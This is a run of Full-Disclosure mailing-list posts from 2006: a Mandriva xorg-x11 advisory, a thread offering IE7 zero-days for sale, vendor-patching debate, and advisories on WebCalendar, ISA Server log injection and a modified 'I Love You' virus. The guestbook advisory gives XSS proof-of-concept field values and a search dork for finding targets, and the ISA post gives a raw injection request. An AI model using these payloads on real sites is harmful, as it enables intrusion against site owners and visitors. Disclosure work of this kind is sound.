[Full-disclosure] [ MDKSA-2006:081-1 ] - Updated xorg-x11 packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:081-1 http://www.mandriva.com/security/ ___ Package : xorg-x11 Date: May 4, 2006 Affected: 2006.0 ___ Problem Description: A problem was discovered in xorg-x11 where the X render extension would mis-calculate the size of a buffer, leading to an overflow that could possibly be exploited by clients of the X server. Update: Rafael Bermudez noticed that the patch for 2006 was mis-applied. This update resolves that issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1526 ___ Updated Packages: Mandriva Linux 2006.0: fc3e3a6a825dd0ed259803f0ec585514 2006.0/RPMS/libxorg-x11-6.9.0-5.6.20060mdk.i586.rpm d81df0a49bd2c7178e93229756009bfe 2006.0/RPMS/libxorg-x11-devel-6.9.0-5.6.20060mdk.i586.rpm f48af91d6c0cac186af5459d7ab84aaf 2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.6.20060mdk.i586.rpm 61090a0da61aa8be2df3df679069fbcb 2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.6.20060mdk.i586.rpm 76a44a4b56266c1a3782c437fa1f879a 2006.0/RPMS/xorg-x11-6.9.0-5.6.20060mdk.i586.rpm 93c2772c76d3c862d97b2e5b020e30a3 2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.6.20060mdk.i586.rpm e7e765f1477cb88637aae30fb50fe626 2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.6.20060mdk.i586.rpm 272c396e96c45676792a6a453c65e7a6 2006.0/RPMS/xorg-x11-doc-6.9.0-5.6.20060mdk.i586.rpm f956116db27ef01ca1f1f73bd720149e 2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.6.20060mdk.i586.rpm d13be66590a678292d640625d40fa923 2006.0/RPMS/xorg-x11-server-6.9.0-5.6.20060mdk.i586.rpm d6bda749c3aecfd11e143bcf2450967e 2006.0/RPMS/xorg-x11-xauth-6.9.0-5.6.20060mdk.i586.rpm b3f05df67c81766894fa4adc6c9744fd 2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.6.20060mdk.i586.rpm 13b62b9ca1e8405c5b7fd4204a206a4c 2006.0/RPMS/xorg-x11-xfs-6.9.0-5.6.20060mdk.i586.rpm 7258f0fa58ea03ebe26d72e8f039eb82 2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.6.20060mdk.i586.rpm ae9801aa6faf4ab58cfaf8fc590a6133 2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.6.20060mdk.i586.rpm 509555c18dbdb0337bd1d00e72c7bfd6 2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.6.20060mdk.i586.rpm e333b8894ec5d3fbca38c95741d95935 2006.0/SRPMS/xorg-x11-6.9.0-5.6.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 505ab1a243407f7397e208a29228dd89 x86_64/2006.0/RPMS/lib64xorg-x11-6.9.0-5.6.20060mdk.x86_64.rpm 4e50a1d049a699571c6b509700721557 x86_64/2006.0/RPMS/lib64xorg-x11-devel-6.9.0-5.6.20060mdk.x86_64.rpm 955c4dbfaafe890868f60f34bf088da9 x86_64/2006.0/RPMS/lib64xorg-x11-static-devel-6.9.0-5.6.20060mdk.x86_64.rpm fc3e3a6a825dd0ed259803f0ec585514 x86_64/2006.0/RPMS/libxorg-x11-6.9.0-5.6.20060mdk.i586.rpm d81df0a49bd2c7178e93229756009bfe x86_64/2006.0/RPMS/libxorg-x11-devel-6.9.0-5.6.20060mdk.i586.rpm f48af91d6c0cac186af5459d7ab84aaf x86_64/2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.6.20060mdk.i586.rpm c7b65a75d52abde5e3634078eb84842d x86_64/2006.0/RPMS/X11R6-contrib-6.9.0-5.6.20060mdk.x86_64.rpm caad39791829b2ef86bef852021c3490 x86_64/2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.6.20060mdk.x86_64.rpm d004173e376cd1fc441fb23d367fe597 x86_64/2006.0/RPMS/xorg-x11-6.9.0-5.6.20060mdk.x86_64.rpm cd364f6c76eedfba39a10c4ddf81cfb0 x86_64/2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.6.20060mdk.x86_64.rpm 1f6c50c0665c21a78b07d3440ffd43c2 x86_64/2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.6.20060mdk.x86_64.rpm f135965f13fcc76d4ca07fa128bd7620 x86_64/2006.0/RPMS/xorg-x11-doc-6.9.0-5.6.20060mdk.x86_64.rpm 3304d60e7288911924951718c74afa30 x86_64/2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.6.20060mdk.x86_64.rpm 2d73dbacee80e596f3dbdf0db8a5ffda x86_64/2006.0/RPMS/xorg-x11-server-6.9.0-5.6.20060mdk.x86_64.rpm 8793a61a6824c7ad5c0c8bffe4ce8ee5 x86_64/2006.0/RPMS/xorg-x11-xauth-6.9.0-5.6.20060mdk.x86_64.rpm 674f714d7fa826c12fb0b59429718d1f x86_64/2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.6.20060mdk.x86_64.rpm a07559d45b7622c3c9b0eed36a6c1000 x86_64/2006.0/RPMS/xorg-x11-xfs-6.9.0-5.6.20060mdk.x86_64.rpm 87abf49419cc1417f56e45227034f7bf x86_64/2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.6.20060mdk.x86_64.rpm fcfcded879d21656bfddb8ecb91b47e2 x86_64/2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.6.20060mdk.x86_64.rpm efaeb4f777b5372d55fd8d9128bb80b6 x86_64/2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.6.20060mdk.x86_64.rpm e333b8894ec5d3fbca38c95741d95935 x86_64/2006.0/SRPMS/xorg-x11-6.9.0-5.6.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All pa
Re: [Full-disclosure] IE7 Zero Day
Ahh and here come the clueless posts from those that have never found a vulnerability themselves. Sigh... On Thu, 04 May 2006 21:51:50 -0700 "Randal T. Rioux" <[EMAIL PROTECTED]> wrote: >[EMAIL PROTECTED] wrote: >> If you are interested in bidding. I can provide you wtih an >> account to provide the funds. Social Security numbers are for >> American citizens only so don't assume I am such a person. >> > >I'll start the bidding at $1.25 USD. Do you take checks? > >I have a slighty used half-liter bottle of Mountain Dew for trade >if >you're willing to barter. > >Let me know... I'm serious. > >Randy > >PS I found that the rotors on my Jeep wear down faster than they >should. >Does anyone know a contact at Daimler/Chrylser that would be >interested >in buying this vulnerability information? I don't have a fix yet >though. > > >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote: > If you are interested in bidding. I can provide you wtih an > account to provide the funds. Social Security numbers are for > American citizens only so don't assume I am such a person. > I'll start the bidding at $1.25 USD. Do you take checks? I have a slighty used half-liter bottle of Mountain Dew for trade if you're willing to barter. Let me know... I'm serious. Randy PS I found that the rotors on my Jeep wear down faster than they should. Does anyone know a contact at Daimler/Chrylser that would be interested in buying this vulnerability information? I don't have a fix yet though. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
If you are interested in bidding. I can provide you wtih an account to provide the funds. Social Security numbers are for American citizens only so don't assume I am such a person. On Thu, 04 May 2006 20:58:26 -0700 Peter Besenbruch <[EMAIL PROTECTED]> wrote: >[EMAIL PROTECTED] wrote: >> As a spectator, I wonder who's going to bid on it, and how much, >without any >> clues as to what exactly the extent is (crash, code execution as >user, code >> exec as system, etc), or even any proof you have the goods.. ;) > >If the guy provided more information, such as his full name, >address, >and phone number, his bank account info, his social security >number, >that sort of thing, I might trust him. ;) >-- >Hawaiian Astronomical Society: http://www.hawastsoc.org >HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky > >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
I can prove that I have "the goods" to those that are seriously interested in buying. On Thu, 04 May 2006 19:26:53 -0700 [EMAIL PROTECTED] wrote: >On Thu, 04 May 2006 16:46:28 PDT, [EMAIL PROTECTED] said: >> Highest bidder that can convince me that you will actually pay >> wins. > >As a spectator, I wonder who's going to bid on it, and how much, >without any >clues as to what exactly the extent is (crash, code execution as >user, code >exec as system, etc), or even any proof you have the goods.. ;) Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote: As a spectator, I wonder who's going to bid on it, and how much, without any clues as to what exactly the extent is (crash, code execution as user, code exec as system, etc), or even any proof you have the goods.. ;) If the guy provided more information, such as his full name, address, and phone number, his bank account info, his social security number, that sort of thing, I might trust him. ;) -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
On Thu, 04 May 2006 16:46:28 PDT, [EMAIL PROTECTED] said: > Highest bidder that can convince me that you will actually pay > wins. As a spectator, I wonder who's going to bid on it, and how much, without any clues as to what exactly the extent is (crash, code execution as user, code exec as system, etc), or even any proof you have the goods.. ;) pgpSlLS3d41AT.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities?
On Thu, 04 May 2006 18:15:18 PDT, Bill Stout said: > That's an excellent and well thought out reply. Sounds like you have > some experience in delivering software. Not commercial software. However, commercial software ship dates are infinitely flexible compared to "30,000 students are showing up Tuesday and the class registration and housing checking systems *have* to be ready" ;) > It would seem that if a few days buffer were built into the system, > specifically to check in security fixes prior to QA; that would be a > huge 'CYA' benefit to prevent those 'CLM' moves and to protect the > consumers of the software. Trust me - the original plan usually *starts* with *more* than "a few days buffer". Recommended reading: "The Mythical Man Month" by Fred Brooks - what he learned as the project manager for IBM's OS/360 operating system development, which still ranks as one of the biggest software development projects in history. One of the famous quotes from it: "Adding programmers to late software projects makes them later" pgpCbkwTNwqnS.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IE7 Information Disclosure - For sale
I just found a second bug that allows one to remotely retrieve the contents of other tabs inside of IE7. Again, for sale. Highest bidder. Exploit example is to trick luser to visiting website which would then download contents of all open tabs including cookie and session information. Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities?
Thanks Vladis, That's an excellent and well thought out reply. Sounds like you have some experience in delivering software. It would seem that if a few days buffer were built into the system, specifically to check in security fixes prior to QA; that would be a huge 'CYA' benefit to prevent those 'CLM' moves and to protect the consumers of the software. Bill Stout -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Wednesday, May 03, 2006 11:10 PM To: Bill Stout Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities? On Wed, 03 May 2006 22:23:42 PDT, Bill Stout said: > If a patch is ready in just a few days, and QA for a patch takes several > weeks, it would seem the vendor already knew about the vulnerability and > had a fix ready, either for next release or vulnerability discovery, It would *seem* that way, yes. But it often doesn't work that way. Quite often, the bug is a Homer Simpson "D'Oh!" error (such as most buffer overruns), so a "first cut" of a patch can be done in a few *hours*. > which ever came first. Otherwise the fix would take weeks to test and > release in order to test all compatibilities related to the bug fix, > correct? But it can *still* take a while to actually integrate and test the fix, especially if it involves an API change. For instance, a buffer overflow may be fixed by passing in a new "length" parameter. Then you have to find and fix all the places that call the function, to also pass the length, and then find all the places that call those places, and so far... And if you're *really* unlucky, the API change goes to multiple code repositories for multiple products... and things get *really* ugly. Try it sometime - pull down the source for Firefox or OpenOffice, which are "average" sized for large software systems. Unpack it someplace (make sure you have multiple gigabytes of disk available). Now find some random foo.h file somewhere in the tree. Find a 'struct' in that .h, and add one more thing to that struct. 'int blat;' is good enough. Now see how long it takes you to find every use of that struct, and add a 'foo_struct.blat = 5;' (or 6, or 9, or different value at each use). Then have fun tracking down all the *implicit* uses - code that uses sizeof(), or places where the code blows up if 'sizeof(struct foo_struct)' is over the size you can store in a certain field in a database. Oh, and don't forget to find that XML file that generates the marshal/demarshal code for this ;) > So, my question is, if the vendor knew about vulnerabilities before a > product was released, why wouldn't they simply delay the ship a few days > in order to QA the patch for vulnerabilities they already knew about? There's this thing called a 'freeze date', and it's often several *months* before the planned 'ship date'. You have to freeze the code at *some* point, do the QA, and at some point produce a .ISO or similar to send to burn CDs. Then you have to send the CD off to be duplicated (even a *big* duplicating shop is going to take a while to produce 10,000,000 burned, custom artwork, manuals, into a box and shrink wrapped and sent to Office Max and Best Buy and Walmart and everyplace else. Oh, and you need to send copies to whatever PC manufacturers bundle it, so Dell and HP and Levono can integrate it into the images *they* install. So you're sitting there, 3 million CD's burned, Dell and HP ramping up and Levono ready to go tomorrow - and you want to *delay a few days* because there might be a bug Somebody's gonna *pay* for that fuck-up. It's a CLM (Career-Limiting Move). http://today.reuters.com/business/newsArticle.aspx?type=technology&story ID=nN02271704 Vista is slipping *again*. And the news took MSFT stock down 0.22 to $24.07. That's a 1% hit in market value. And that means that Gates's $40B in MSFT stock just dropped $400M in value. That means Gates is gonna rip Ballmer a new one (wouldn't *you* if you just lost $400M?). Ballmer is gonna rip somebody a new one, and so on down the line. You wanna be the software engineer at the end of that line? You're gonna get ripped so many new ones, you're gonna be called "Swiss Cheese" at your next job... And it's not limited to proprietary software either - the guys over at Firefox just released 1.5.0.3 to fix a nasty flaw. Now, *somebody* had to make the hard call "We ship 1.5.0.3 *now* to fix this bug, and the stuff that *was* targeted for 0.3 is going to slip to 0.4". Do you want to be the software engineer that tries to say "Umm.. can we hold 0.3 for a week and a half while we get these 3 minor bugfixes finished?" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
What do you do for work? Are you paid to work with computers? Do not judge others and how they choose to make a living. I am doing nothing different than anyone else who has a skill and needs to support family. If you were smarter you wouldn't need me to share my knowledge in any way now would you? On Thu, 04 May 2006 16:52:57 -0700 FRLinux <[EMAIL PROTECTED]> wrote: >On 5/5/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: >> Highest bidder that can convince me that you will actually pay >> wins. > >Whatever happened to sharing knowledge in a common way ... Honest, >get >a life ... > >Steph Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
On 5/5/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: Highest bidder that can convince me that you will actually pay wins. Whatever happened to sharing knowledge in a common way ... Honest, get a life ... Steph ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IE7 Zero Day
Yes, this is a beta product but I have reason to believe that this issue will not be discovered of fixed by M$ before it goes to gold. Why do I believe this? Because the issue is found in IE 6 but doesnt seem to exploit. Not saying it is not exploitable I am saying that I cant make it exploit. I work as a pizza delivery driver at night and work part time landscaping in my days. So I feel it is only fair that I be compensated for this vulnerability. Highest bidder that can convince me that you will actually pay wins. Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebCalendar User Account Enumeration Weakness
WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. See project homepage for details: http://www.k5n.us/webcalendar.php Description: The problem is that different error messages are returned depending on whether an unsuccessful login attempt is performed with a valid or invalid username in the login page. Error message extract from 'includes/user.php' can be "Invalid login" "Invalid login: incorrect password" "Invalid login: no such user" The weakness has been confirmed in version 1.0.1, 1.0.2, 1.0.3. Other versions may also be affected. David Maciejak ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
Guys, these are signature-based systems... LET ME SHED SOME LIGHT ON THIS, ALL SIGNATURE-BASED SYSTEMS CAN BE SUBVERTED. THIS IS A KNOWN FACT PEOPLE HAVE BEEN DISCUSSING FOR YEARS. Let me be the first to welcome you to the year 1999. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Thiago H. Pojda Sent: Thursday, May 04, 2006 11:00 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure,NortonAntivirus 2005 and the virus The major point of the thread is that some of the most popular AV scanners used in big companies, do not detect it. Yea, I did post that AVG scanner detected it. And also a few other people did the same with their AV scanners. And that is scary because even small or non-so-well-known av scanners detect a slight difference in a virus file and the oh-so-almighty ones don't. On 5/4/06, Steven Rakick <[EMAIL PROTECTED]> wrote: Great. Now we're going to have every freaking dork with an AV posting about how their system detected it. GOOD WORK, FUCKO. __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ISA Server 2004 Log Manipulation
3 days at 600 per second non stop = 86400 sec/day * 600 = 51 840 000 attempts. after 51.8 million tries, the product was able to inject the numbers 1,2,3 into a parameter into a log that many see as non-critical. and it looks like you tried 1,2,3,4 but it only did 1,2,3. c'mon. log manipulation should mean more than that, shouldnt it? h. beSIRT wrote: Discovered by: Noam Rathaus using the beSTORM fuzzer. Reported to vendor: December, 2005. Vendor response: Microsoft does not consider this issue to be a security vulnerability. Public release date: 4th of May, 2006. Advisory URL: http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txt Introduction There is a Log Manipulation vulnerability in Microsoft ISA Server 2004, which when exploited will enable a malicious user to manipulate the Destination Host parameter of the log file. Technical Details - By sending the following request to the server: GET / HTTP/1.0 Host: %01%02%03%04 Transfer-Encoding: whatever We were able to insert arbitrary characters, in this case the ASCII characters 1, 2, 3 (respectively) into the Destination Host parameter of the log file. This has been found after 3 days of running the beSTORM fuzzer at 600+ Sessions per Second while monitoring the ISA Server log file for problems. About ISA Server 2004 - "Microsoft Internet Security and Acceleration (ISA) Server 2004 is the advanced stateful packet and application-layer inspection firewall, virtual private network (VPN), and Web cache solution that enables enterprise customers to easily maximize existing information technology (IT) investments by improving network security and performance." Product URL: http://www.microsoft.com/isaserver/default.mspx -- beSIRT - Beyond Security's Incident Response Team [EMAIL PROTECTED] www.BeyondSecurity.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ISA Server 2004 Log Manipulation
why do you consider this a vulnerability. the host parameter is client based and can't be trusted. many servers ignore it altogetherOn 5/4/06, beSIRT <[EMAIL PROTECTED]> wrote: Discovered by: Noam Rathaus using the beSTORM fuzzer.Reported to vendor: December, 2005.Vendor response: Microsoft does not consider this issue to be a securityvulnerability.Public release date: 4th of May, 2006. Advisory URL:http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txtIntroductionThere is a Log Manipulation vulnerability in Microsoft ISA Server 2004, which when exploited will enable a malicious user to manipulate the DestinationHost parameter of the log file.Technical Details-By sending the following request to the server:GET / HTTP/1.0 Host: %01%02%03%04Transfer-Encoding: whateverWe were able to insert arbitrary characters, in this case the ASCII characters1, 2, 3 (respectively) into the Destination Host parameter of the log file. This has been found after 3 days of running the beSTORM fuzzer at 600+Sessions per Second while monitoring the ISA Server log file for problems.About ISA Server 2004-"Microsoft Internet Security and Acceleration (ISA) Server 2004 is the advanced stateful packet and application-layer inspection firewall, virtualprivate network (VPN), and Web cache solution that enables enterprisecustomers to easily maximize existing information technology (IT) investments by improving network security and performance."Product URL: http://www.microsoft.com/isaserver/default.mspx--beSIRT - Beyond Security's Incident Response Team [EMAIL PROTECTED].www.BeyondSecurity.com___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
Symantec Antivirus detected and removed it as "VBS.LoveLetter.CI" version 10.0.1.1000 engine 61.1.0.11 defs 2006/05/03 rev.18 - Original Message - From: "Peter van den Houten" <[EMAIL PROTECTED]> To: Sent: Thursday, May 04, 2006 4:39 PM Subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You" My ISP caught it: - The Orange virus filtering service discovered a virus or unauthorised code (e.g. spyware or trojan) in an email sent to you. Message sender: [EMAIL PROTECTED] Message recipient(s): [EMAIL PROTECTED] Message subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Message date: Thu, 4 May 2006 13:32:26 +0200 (CEST) Message size: 8.84Kb The e-mail contained this virus or unauthorized code: >>> [VBS/LoveLetter-MM] On 5/4/06, *Joxean Koret* <> wrote: Sorry, the email was sended without the attachment. --- Regards, Joxean Koret > Attached goes a working "I Love You" virus in which > I > changed ONLY the variable "dirsystem" with the name > "kk2" (The file attached have the extension > ".txt.gz", > otherwise, with the .vbs extension the file will be > locked by all the most populars anti-viral > toolkits). Disclaimer: ~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Joxean Koret at joxeanpiti@yah00
[Full-disclosure] bigwebmaster guestbook multiply XSS
Affected software:
Bigwebmaster Guestbook version 1.02 and down
Vendor:
http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/
Introduction:
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.
Vulnerability Details:
when adding a comment addguest.cgi accepts javascript code into
mail,site,city,state and country fields which lead to javascript cross
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.
POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: [EMAIL PROTECTED] alert('XSS in mail');
site: http://www.example.com/ alert('XSS in site');
city: alert('XSS in city');
state: alert('XSS in state');
country: alert('XSS in country');
google search:
intitle:Big Webmaster Guestbook
Vendor Status:
NOT NOTIFIED
Solution:
I DON'T CARE
Javor Ninov aka DrFrancky
http://www.securitydot.net/
signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
The major point of the thread is that some of the most popular AV scanners used in big companies, do not detect it. Yea, I did post that AVG scanner detected it. And also a few other people did the same with their AV scanners. And that is scary because even small or non-so-well-known av scanners detect a slight difference in a virus file and the oh-so-almighty ones don't.On 5/4/06, Steven Rakick <[EMAIL PROTECTED]> wrote: Great. Now we're going to have every freaking dorkwith an AV posting about how their system detected it. GOOD WORK, FUCKO.__Do You Yahoo!?Tired of spam? Yahoo! Mail has the best spam protection aroundhttp://mail.yahoo.com ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Thiago Henrique PojdaCuritiba - PRXX--xx--XX"É fácil ter-se um sistema de computação seguro. Você meramente tem que desconectar o seu sistema de qualquer rede externa, e permitir somente terminais ligados diretamente a ele. Pôr a máquina e seus terminais em uma sala fechada, e um guarda na porta." F.T. Grampp e R.H. MorrisXX--xx--IV Encontro Nacional dos Estudantes de Computação31 de Julho a 04 de Agosto de 2006 - Poços de Caldas - MGhttp://www.enec.org.br/enecomp2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
Great. Now we're going to have every freaking dork with an AV posting about how their system detected it. GOOD WORK, FUCKO. __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
My ISP caught it: - The Orange virus filtering service discovered a virus or unauthorised code (e.g. spyware or trojan) in an email sent to you. Message sender: [EMAIL PROTECTED] Message recipient(s): [EMAIL PROTECTED] Message subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Message date: Thu, 4 May 2006 13:32:26 +0200 (CEST) Message size: 8.84Kb The e-mail contained this virus or unauthorized code: >>> [VBS/LoveLetter-MM] On 5/4/06, *Joxean Koret* <> wrote: Sorry, the email was sended without the attachment. --- Regards, Joxean Koret > Attached goes a working "I Love You" virus in which > I > changed ONLY the variable "dirsystem" with the name > "kk2" (The file attached have the extension > ".txt.gz", > otherwise, with the .vbs extension the file will be > locked by all the most populars anti-viral > toolkits). Disclaimer: ~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact: Joxean Koret at joxeanpiti@yah00
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus
The AV system (Vexira MailArmor version 2.x) of local ISP detected is as VBS/Loveletter.B: Subject: Virus havaittu / Virus found *** Virus found from your email *** Virusprotection software found the following virus from an email message sent to you: VBS/Loveletter.B virus The virus was sent by: [EMAIL PROTECTED] (header information removed) - Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
AVG detects it as LoveLetter.Database: 268.5.3/331 Database Date: 3/5/2006On 5/4/06, Joxean Koret <> wrote: Sorry, the email was sended without the attachment.---Regards,Joxean Koret> Attached goes a working "I Love You" virus in which> I> changed ONLY the variable "dirsystem" with the name > "kk2" (The file attached have the extension> ".txt.gz",> otherwise, with the .vbs extension the file will be> locked by all the most populars anti-viral> toolkits). Disclaimer:~~~The information in this advisory and any of itsdemonstrations is provided "as is" without anywarranty of any kind.I am not liable for any direct or indirect damages caused as a result of using the information ordemonstrations provided in any part of thisadvisory.---Contact: Joxean Koret at joxeanpiti@yah00
[Full-disclosure] ISA Server 2004 Log Manipulation
